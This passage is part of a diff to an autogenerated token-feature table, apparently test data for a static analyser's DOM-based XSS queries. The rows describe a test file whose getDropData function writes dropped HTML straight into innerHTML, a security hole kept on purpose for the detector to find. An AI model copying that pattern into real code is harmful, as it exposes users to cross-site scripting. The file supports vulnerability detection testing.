plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:16:75:21 | length | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:16:75:21 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:27:75:27 | 1 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:27:75:27 | 1 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:27:75:27 | 1 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:27:75:27 | 1 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:75:27:75:27 | 1 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:17 | src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:17 | src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:17 | src | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:17 | src | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:17 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src = imgs[0].src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src = imgs[0].src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src = imgs[0].src | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src = imgs[0].src | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:15:76:31 | src = imgs[0].src | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:24 | imgs | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:24 | imgs | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:24 | imgs | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:24 | imgs | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:24 | imgs | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:27 | imgs[0] | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:27 | imgs[0] | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:27 | imgs[0] | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:27 | imgs[0] | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:27 | imgs[0] | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:31 | imgs[0].src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:31 | imgs[0].src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:31 | imgs[0].src | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:31 | imgs[0].src | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:21:76:31 | imgs[0].src | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:26:76:26 | 0 | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:26:76:26 | 0 | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:26:76:26 | 0 | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:26:76:26 | 0 | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:26:76:26 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:29:76:31 | src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:29:76:31 | src | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:29:76:31 | src | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:29:76:31 | src | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:76:29:76:31 | src | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:17 | dropItems | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:17 | dropItems | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:17 | dropItems | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:17 | dropItems | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:17 | dropItems | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:21 | dropItems.add | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:21 | dropItems.add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:21 | dropItems.add | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:21 | dropItems.add | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:21 | dropItems.add | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | dropItems.add(src) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | dropItems.add(src) | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | dropItems.add(src) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | dropItems.add(src) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | dropItems.add(src) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | exceptional return of dropItems.add(src) | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | exceptional return of dropItems.add(src) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | exceptional return of dropItems.add(src) | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | exceptional return of dropItems.add(src) | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:9:77:26 | exceptional return of dropItems.add(src) | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:19:77:21 | add | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:19:77:21 | add | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:19:77:21 | add | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:19:77:21 | add | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:19:77:21 | add | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | CalleeFlexibleAccessPath | dropItems.add | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13623,6 +101234,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:77:23:77:25 | src | receiverName | dropItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:16 | e | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:16 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:16 | e | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:16 | e | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:16 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:29 | e.dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:29 | e.dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:29 | e.dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:29 | e.dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:29 | e.dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:35 | e.dataTransfer.types | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:35 | e.dataTransfer.types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:35 | e.dataTransfer.types | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:35 | e.dataTransfer.types | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:35 | e.dataTransfer.types | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:44 | e.dataT ... ncludes | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:44 | e.dataT ... ncludes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:44 | e.dataT ... ncludes | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:44 | e.dataT ... ncludes | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:44 | e.dataT ... ncludes | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | e.dataT ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | e.dataT ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | e.dataT ... plain') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | e.dataT ... plain') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | e.dataT ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | exceptional return of e.dataT ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | exceptional return of e.dataT ... plain') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | exceptional return of e.dataT ... plain') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | exceptional return of e.dataT ... plain') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:16:79:58 | exceptional return of e.dataT ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:18:79:29 | dataTransfer | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:18:79:29 | dataTransfer | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:18:79:29 | dataTransfer | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:18:79:29 | dataTransfer | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:18:79:29 | dataTransfer | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:31:79:35 | types | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:31:79:35 | types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:31:79:35 | types | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:31:79:35 | types | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:31:79:35 | types | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:37:79:44 | includes | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:37:79:44 | includes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:37:79:44 | includes | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:37:79:44 | includes | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:37:79:44 | includes | fileImports | | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | CalleeFlexibleAccessPath | e.dataTransfer.types.includes | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | @@ -13630,6 +101286,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | enclosingFunctionName | getDropData | | autogenerated/Xss/DomBasedXss/dragAndDrop.ts:79:46:79:57 | 'text/plain' | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:21 | plainText | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:21 | plainText | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:21 | plainText | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:21 | plainText | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:21 | plainText | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainTe ... plain') | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainTe ... plain') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainTe ... plain') | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types includes text/plain plainText e dataTransfer getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainTe ... plain') | enclosingFunctionName | getDropData | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainTe ... plain') | fileImports | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainText | contextFunctionInterfaces | drop(e)\ngetDropData(e)\ninstall(el)\nondrop(e) | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainText | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dragAndDrop.ts:80:13:80:60 | plainText | enclosingFunctionBody | e DragEvent Promise Array File dropItems Set File e dataTransfer files length 0 i 0 i e dataTransfer files length i file e dataTransfer files i e dataTransfer types includes text/html droppedHtml e dataTransfer getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e dataTransfer types 